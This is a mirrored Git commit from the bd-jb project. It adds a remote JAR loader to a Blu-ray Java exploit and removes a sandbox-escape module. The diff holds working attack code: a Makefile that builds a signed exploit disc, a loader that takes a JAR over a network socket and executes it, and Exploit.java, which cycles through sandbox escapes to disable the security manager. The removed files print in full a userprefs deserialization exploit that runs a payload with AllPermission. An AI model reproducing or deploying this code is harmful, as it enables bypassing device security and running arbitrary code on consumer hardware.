mirror of
https://github.com/TheOfficialFloW/bd-jb
synced 2024-12-12 10:12:15 -05:00
Add remote JAR loader and remove userprefs exploit.
This commit is contained in:
parent
cca6e2810b
commit
44713ef59f
39
Makefile
39
Makefile
@ -5,8 +5,12 @@ LIB = lib
|
|||||||
SRC = src
|
SRC = src
|
||||||
TOOLS = tools
|
TOOLS = tools
|
||||||
|
|
||||||
CLASSES = \
|
LOADER_CLASSES = \
|
||||||
$(SRC)/com/bdjb/ExploitXlet.java \
|
$(SRC)/com/bdjb/LoaderXlet.java \
|
||||||
|
$(SRC)/com/bdjb/Loader.java \
|
||||||
|
$(SRC)/com/bdjb/Screen.java \
|
||||||
|
|
||||||
|
EXPLOIT_CLASSES = \
|
||||||
$(SRC)/com/bdjb/Exploit.java \
|
$(SRC)/com/bdjb/Exploit.java \
|
||||||
$(SRC)/com/bdjb/Screen.java \
|
$(SRC)/com/bdjb/Screen.java \
|
||||||
$(SRC)/com/bdjb/api/API.java \
|
$(SRC)/com/bdjb/api/API.java \
|
||||||
@ -25,39 +29,42 @@ CLASSES = \
|
|||||||
$(SRC)/com/bdjb/jit/JitCompilerReceiverImpl.java \
|
$(SRC)/com/bdjb/jit/JitCompilerReceiverImpl.java \
|
||||||
$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
|
$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
|
||||||
$(SRC)/com/bdjb/exploit/sandbox/ExploitDefaultImpl.java \
|
$(SRC)/com/bdjb/exploit/sandbox/ExploitDefaultImpl.java \
|
||||||
$(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
|
|
||||||
$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
|
$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
|
||||||
$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
|
$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
|
||||||
$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
|
$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
|
||||||
$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
|
$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
|
||||||
$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
|
$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
|
||||||
$(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
|
|
||||||
$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
|
$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
|
||||||
$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
|
$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
|
||||||
|
|
||||||
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
|
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
|
||||||
|
|
||||||
all: directory serialized classes jar bdjo_bdmv
|
all: loader exploit
|
||||||
|
|
||||||
directory:
|
loader: build_directory loader_classes loader_jar loader_bdjo_bdmv
|
||||||
|
|
||||||
|
exploit: build_directory exploit_classes exploit_jar
|
||||||
|
|
||||||
|
build_directory:
|
||||||
mkdir -p $(BUILD)
|
mkdir -p $(BUILD)
|
||||||
|
|
||||||
serialized:
|
loader_classes:
|
||||||
javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
|
javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(LOADER_CLASSES)
|
||||||
java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
|
|
||||||
rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
|
|
||||||
|
|
||||||
classes:
|
exploit_classes:
|
||||||
javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES)
|
javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(EXPLOIT_CLASSES)
|
||||||
|
|
||||||
jar:
|
loader_jar:
|
||||||
rm -rf $(BUILD)/jdk
|
|
||||||
mkdir -p $(DISC)/BDMV/JAR
|
mkdir -p $(DISC)/BDMV/JAR
|
||||||
cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm
|
cp $(SRC)/com/bdjb/bluray.LoaderXlet.perm $(BUILD)/com/bdjb/bluray.LoaderXlet.perm
|
||||||
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
|
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
|
||||||
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
|
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
|
||||||
|
|
||||||
bdjo_bdmv:
|
exploit_jar:
|
||||||
|
rm -rf $(BUILD)/jdk
|
||||||
|
cd $(BUILD) && jar cf 00000.jar . && cd ..
|
||||||
|
|
||||||
|
loader_bdjo_bdmv:
|
||||||
mkdir -p $(DISC)/BDMV/BDJO
|
mkdir -p $(DISC)/BDMV/BDJO
|
||||||
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
|
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
|
||||||
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
|
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
|
||||||
|
@ -15,7 +15,7 @@
|
|||||||
<classpathExtension></classpathExtension>
|
<classpathExtension></classpathExtension>
|
||||||
<iconFlags>0x0</iconFlags>
|
<iconFlags>0x0</iconFlags>
|
||||||
<iconLocator></iconLocator>
|
<iconLocator></iconLocator>
|
||||||
<initialClassName>com.bdjb.ExploitXlet</initialClassName>
|
<initialClassName>com.bdjb.LoaderXlet</initialClassName>
|
||||||
<priority>128</priority>
|
<priority>128</priority>
|
||||||
<profiles>
|
<profiles>
|
||||||
<majorVersion>1</majorVersion>
|
<majorVersion>1</majorVersion>
|
||||||
|
@ -9,26 +9,16 @@ package com.bdjb;
|
|||||||
|
|
||||||
import com.bdjb.exploit.kernel.ExploitKernelInterface;
|
import com.bdjb.exploit.kernel.ExploitKernelInterface;
|
||||||
import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
|
import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
|
||||||
import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
|
|
||||||
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
|
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
|
||||||
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
|
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
|
||||||
import java.io.FileOutputStream;
|
import java.lang.reflect.Method;
|
||||||
import java.io.InputStream;
|
|
||||||
import java.io.OutputStream;
|
|
||||||
import java.net.InetAddress;
|
|
||||||
import java.net.ServerSocket;
|
|
||||||
import java.net.Socket;
|
|
||||||
|
|
||||||
class Exploit implements Runnable {
|
|
||||||
static void init() {
|
|
||||||
Screen.println("[+] bd-jb by theflow");
|
|
||||||
|
|
||||||
|
public class Exploit {
|
||||||
|
public static void main(Method screenPrintln) {
|
||||||
|
Screen.setRemotePrintln(screenPrintln);
|
||||||
Screen.println("[*] Escaping Java Sandbox...");
|
Screen.println("[*] Escaping Java Sandbox...");
|
||||||
|
|
||||||
Class[] sandboxExploits =
|
Class[] sandboxExploits = new Class[] {ExploitDefaultImpl.class, ExploitServiceProxyImpl.class};
|
||||||
new Class[] {
|
|
||||||
ExploitDefaultImpl.class, ExploitUserPrefsImpl.class, ExploitServiceProxyImpl.class
|
|
||||||
};
|
|
||||||
|
|
||||||
for (int i = 0; i < sandboxExploits.length; i++) {
|
for (int i = 0; i < sandboxExploits.length; i++) {
|
||||||
try {
|
try {
|
||||||
@ -46,29 +36,4 @@ class Exploit implements Runnable {
|
|||||||
Screen.println("[-] Error could not disable security manager.");
|
Screen.println("[-] Error could not disable security manager.");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
static void start() {
|
|
||||||
new Thread(new Exploit()).start();
|
|
||||||
}
|
|
||||||
|
|
||||||
public void run() {
|
|
||||||
if (System.getSecurityManager() != null) {
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
Screen.println("[*] Exploiting kernel...");
|
|
||||||
|
|
||||||
Class[] kernelExploits = new Class[] {};
|
|
||||||
|
|
||||||
for (int i = 0; i < kernelExploits.length; i++) {
|
|
||||||
try {
|
|
||||||
ExploitKernelInterface exploit = (ExploitKernelInterface) kernelExploits[i].newInstance();
|
|
||||||
if (exploit.trigger()) {
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
} catch (Exception e) {
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
73
src/com/bdjb/Loader.java
Normal file
73
src/com/bdjb/Loader.java
Normal file
@ -0,0 +1,73 @@
|
|||||||
|
/*
|
||||||
|
* Copyright (C) 2021 Andy Nguyen
|
||||||
|
*
|
||||||
|
* This software may be modified and distributed under the terms
|
||||||
|
* of the MIT license. See the LICENSE file for details.
|
||||||
|
*/
|
||||||
|
|
||||||
|
package com.bdjb;
|
||||||
|
|
||||||
|
import java.io.FileOutputStream;
|
||||||
|
import java.io.InputStream;
|
||||||
|
import java.io.OutputStream;
|
||||||
|
import java.net.ServerSocket;
|
||||||
|
import java.net.Socket;
|
||||||
|
import java.net.URL;
|
||||||
|
import java.lang.reflect.Method;
|
||||||
|
import org.dvb.lang.DVBClassLoader;
|
||||||
|
|
||||||
|
class Loader implements Runnable {
|
||||||
|
private static final String MNT_ADA_JAR_FILE = "/OS/HDD/download0/mnt_ada/00000.jar";
|
||||||
|
|
||||||
|
private static final String EXPLOIT_CLASS_NAME = "com.bdjb.Exploit";
|
||||||
|
private static final String MAIN_METHOD_NAME = "main";
|
||||||
|
private static final String PRINTLN_METHOD_NAME = "println";
|
||||||
|
|
||||||
|
static void startJarLoader() {
|
||||||
|
new Thread(new Loader()).start();
|
||||||
|
}
|
||||||
|
|
||||||
|
public void run() {
|
||||||
|
Screen.println("[+] bd-jb by theflow");
|
||||||
|
|
||||||
|
while (true) {
|
||||||
|
Screen.println("[*] Listening for remote JAR on port 9025...");
|
||||||
|
|
||||||
|
try {
|
||||||
|
ServerSocket serverSocket = new ServerSocket(9025);
|
||||||
|
Socket socket = serverSocket.accept();
|
||||||
|
InputStream inputStream = socket.getInputStream();
|
||||||
|
OutputStream outputStream = new FileOutputStream(MNT_ADA_JAR_FILE);
|
||||||
|
|
||||||
|
byte[] buf = new byte[8192];
|
||||||
|
int total = 0;
|
||||||
|
int read;
|
||||||
|
while ((read = inputStream.read(buf)) > 0) {
|
||||||
|
outputStream.write(buf, 0, read);
|
||||||
|
total += read;
|
||||||
|
}
|
||||||
|
|
||||||
|
outputStream.close();
|
||||||
|
inputStream.close();
|
||||||
|
|
||||||
|
serverSocket.close();
|
||||||
|
|
||||||
|
Screen.println("[+] Received " + total + " bytes");
|
||||||
|
|
||||||
|
Screen.println("[+] Launching JAR...");
|
||||||
|
|
||||||
|
DVBClassLoader dvbClassLoader =
|
||||||
|
DVBClassLoader.newInstance(new URL[] {new URL("file://" + MNT_ADA_JAR_FILE)});
|
||||||
|
Class exploitClass = dvbClassLoader.loadClass(EXPLOIT_CLASS_NAME);
|
||||||
|
Method main = exploitClass.getMethod(MAIN_METHOD_NAME, new Class[] {Method.class});
|
||||||
|
Method screenPrintln =
|
||||||
|
Screen.class.getMethod(PRINTLN_METHOD_NAME, new Class[] {String.class});
|
||||||
|
main.invoke(null, new Object[] {screenPrintln});
|
||||||
|
|
||||||
|
Screen.println("[+] JAR exited");
|
||||||
|
} catch (Exception e) {
|
||||||
|
Screen.println("[-] Error: " + e.getMessage());
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
@ -13,13 +13,11 @@ import javax.tv.xlet.XletContext;
|
|||||||
import org.havi.ui.HScene;
|
import org.havi.ui.HScene;
|
||||||
import org.havi.ui.HSceneFactory;
|
import org.havi.ui.HSceneFactory;
|
||||||
|
|
||||||
public class ExploitXlet implements Xlet {
|
public class LoaderXlet implements Xlet {
|
||||||
private HScene scene;
|
private HScene scene;
|
||||||
private Screen screen;
|
private Screen screen;
|
||||||
|
|
||||||
public void initXlet(XletContext context) {
|
public void initXlet(XletContext context) {
|
||||||
Exploit.init();
|
|
||||||
|
|
||||||
screen = Screen.getInstance();
|
screen = Screen.getInstance();
|
||||||
screen.setSize(1920, 1080); // BD screen size
|
screen.setSize(1920, 1080); // BD screen size
|
||||||
|
|
||||||
@ -31,7 +29,7 @@ public class ExploitXlet implements Xlet {
|
|||||||
public void startXlet() {
|
public void startXlet() {
|
||||||
screen.setVisible(true);
|
screen.setVisible(true);
|
||||||
scene.setVisible(true);
|
scene.setVisible(true);
|
||||||
Exploit.start();
|
Loader.startJarLoader();
|
||||||
}
|
}
|
||||||
|
|
||||||
public void pauseXlet() {
|
public void pauseXlet() {
|
@ -11,6 +11,7 @@ import java.awt.Color;
|
|||||||
import java.awt.Container;
|
import java.awt.Container;
|
||||||
import java.awt.Font;
|
import java.awt.Font;
|
||||||
import java.awt.Graphics;
|
import java.awt.Graphics;
|
||||||
|
import java.lang.reflect.Method;
|
||||||
import java.util.ArrayList;
|
import java.util.ArrayList;
|
||||||
|
|
||||||
public class Screen extends Container {
|
public class Screen extends Container {
|
||||||
@ -22,14 +23,28 @@ public class Screen extends Container {
|
|||||||
|
|
||||||
private static final Screen instance = new Screen();
|
private static final Screen instance = new Screen();
|
||||||
|
|
||||||
|
private static Method remoteScreenPrintln = null;
|
||||||
|
|
||||||
public static Screen getInstance() {
|
public static Screen getInstance() {
|
||||||
return instance;
|
return instance;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
public static void setRemotePrintln(Method screenPrintln) {
|
||||||
|
remoteScreenPrintln = screenPrintln;
|
||||||
|
}
|
||||||
|
|
||||||
public static void println(String msg) {
|
public static void println(String msg) {
|
||||||
|
if (remoteScreenPrintln != null) {
|
||||||
|
try {
|
||||||
|
remoteScreenPrintln.invoke(null, new Object[] {msg});
|
||||||
|
} catch (Exception e) {
|
||||||
|
// Ignore.
|
||||||
|
}
|
||||||
|
} else {
|
||||||
messages.add(msg);
|
messages.add(msg);
|
||||||
instance.repaint();
|
instance.repaint();
|
||||||
}
|
}
|
||||||
|
}
|
||||||
|
|
||||||
public void paint(Graphics g) {
|
public void paint(Graphics g) {
|
||||||
g.setFont(FONT);
|
g.setFont(FONT);
|
||||||
|
@ -1,61 +0,0 @@
|
|||||||
/*
|
|
||||||
* Copyright (C) 2021 Andy Nguyen
|
|
||||||
*
|
|
||||||
* This software may be modified and distributed under the terms
|
|
||||||
* of the MIT license. See the LICENSE file for details.
|
|
||||||
*/
|
|
||||||
|
|
||||||
package com.bdjb.exploit.sandbox;
|
|
||||||
|
|
||||||
import java.io.FileOutputStream;
|
|
||||||
import java.io.InputStream;
|
|
||||||
import java.io.ObjectOutputStream;
|
|
||||||
import java.io.OutputStream;
|
|
||||||
import org.havi.ui.HSceneFactory;
|
|
||||||
|
|
||||||
/** Implementation of the userprefs deserialization exploit. */
|
|
||||||
public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
|
|
||||||
private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
|
|
||||||
|
|
||||||
private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
|
|
||||||
"/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
|
|
||||||
|
|
||||||
public boolean trigger() throws Exception {
|
|
||||||
try {
|
|
||||||
// Overwrite userprefs with a serialized PayloadClassLoader.
|
|
||||||
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
|
|
||||||
OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
|
|
||||||
|
|
||||||
byte[] buf = new byte[8192];
|
|
||||||
int read;
|
|
||||||
while ((read = inputStream.read(buf)) > 0) {
|
|
||||||
outputStream.write(buf, 0, read);
|
|
||||||
}
|
|
||||||
|
|
||||||
outputStream.close();
|
|
||||||
inputStream.close();
|
|
||||||
|
|
||||||
// Trigger deserialization vulnerability.
|
|
||||||
try {
|
|
||||||
HSceneFactory.getInstance().getDefaultHScene();
|
|
||||||
} catch (ClassCastException e) {
|
|
||||||
// Exception expected.
|
|
||||||
|
|
||||||
// Instantiate the payload class.
|
|
||||||
PayloadClassLoader.getInstance().newPayload();
|
|
||||||
|
|
||||||
return System.getSecurityManager() == null;
|
|
||||||
}
|
|
||||||
} finally {
|
|
||||||
// Restore userprefs file.
|
|
||||||
String[][] preferences = new String[9][];
|
|
||||||
preferences[3] = new String[] {"26"};
|
|
||||||
ObjectOutputStream outputStream =
|
|
||||||
new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
|
|
||||||
outputStream.writeObject(preferences);
|
|
||||||
outputStream.close();
|
|
||||||
}
|
|
||||||
|
|
||||||
return false;
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,57 +0,0 @@
|
|||||||
/*
|
|
||||||
* Copyright (C) 2021 Andy Nguyen
|
|
||||||
*
|
|
||||||
* This software may be modified and distributed under the terms
|
|
||||||
* of the MIT license. See the LICENSE file for details.
|
|
||||||
*/
|
|
||||||
|
|
||||||
package com.bdjb.exploit.sandbox;
|
|
||||||
|
|
||||||
import java.io.ByteArrayOutputStream;
|
|
||||||
import java.io.InputStream;
|
|
||||||
import java.io.ObjectInputStream;
|
|
||||||
import java.io.Serializable;
|
|
||||||
import java.security.AllPermission;
|
|
||||||
import java.security.Permissions;
|
|
||||||
import java.security.ProtectionDomain;
|
|
||||||
|
|
||||||
/** ClassLoader subclass that is instantiated on deserialization. */
|
|
||||||
class PayloadClassLoader extends ClassLoader implements Serializable {
|
|
||||||
private static final long serialVersionUID = 0x4141414141414141L;
|
|
||||||
|
|
||||||
private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
|
|
||||||
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
|
|
||||||
|
|
||||||
private static PayloadClassLoader instance;
|
|
||||||
|
|
||||||
static PayloadClassLoader getInstance() {
|
|
||||||
return instance;
|
|
||||||
}
|
|
||||||
|
|
||||||
private void readObject(ObjectInputStream stream) {
|
|
||||||
instance = this;
|
|
||||||
}
|
|
||||||
|
|
||||||
void newPayload() throws Exception {
|
|
||||||
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_FILE);
|
|
||||||
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
|
|
||||||
|
|
||||||
byte[] buf = new byte[8192];
|
|
||||||
int read;
|
|
||||||
while ((read = inputStream.read(buf)) > 0) {
|
|
||||||
outputStream.write(buf, 0, read);
|
|
||||||
}
|
|
||||||
|
|
||||||
inputStream.close();
|
|
||||||
|
|
||||||
byte[] payload = outputStream.toByteArray();
|
|
||||||
|
|
||||||
// Instantiate the payload class with all permissions to disable the security manager.
|
|
||||||
Permissions permissions = new Permissions();
|
|
||||||
permissions.add(new AllPermission());
|
|
||||||
ProtectionDomain protectionDomain = new ProtectionDomain(null, permissions);
|
|
||||||
Class payloadClass =
|
|
||||||
defineClass(PAYLOAD_CLASS_NAME, payload, 0, payload.length, protectionDomain);
|
|
||||||
payloadClass.newInstance();
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,25 +0,0 @@
|
|||||||
/*
|
|
||||||
* Copyright (C) 2021 Andy Nguyen
|
|
||||||
*
|
|
||||||
* This software may be modified and distributed under the terms
|
|
||||||
* of the MIT license. See the LICENSE file for details.
|
|
||||||
*/
|
|
||||||
|
|
||||||
package com.bdjb.exploit.sandbox;
|
|
||||||
|
|
||||||
import com.bdjb.exploit.sandbox.PayloadClassLoader;
|
|
||||||
import java.io.FileOutputStream;
|
|
||||||
import java.io.ObjectOutputStream;
|
|
||||||
|
|
||||||
/** Simple util to create a serialized object of the PayloadClassLoader class. */
|
|
||||||
class PayloadClassLoaderSerializer {
|
|
||||||
public static void main(String[] args) {
|
|
||||||
try {
|
|
||||||
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
|
|
||||||
objectOutputStream.writeObject(new PayloadClassLoader());
|
|
||||||
objectOutputStream.close();
|
|
||||||
} catch (Exception e) {
|
|
||||||
e.printStackTrace();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
Loading…
Reference in New Issue
Block a user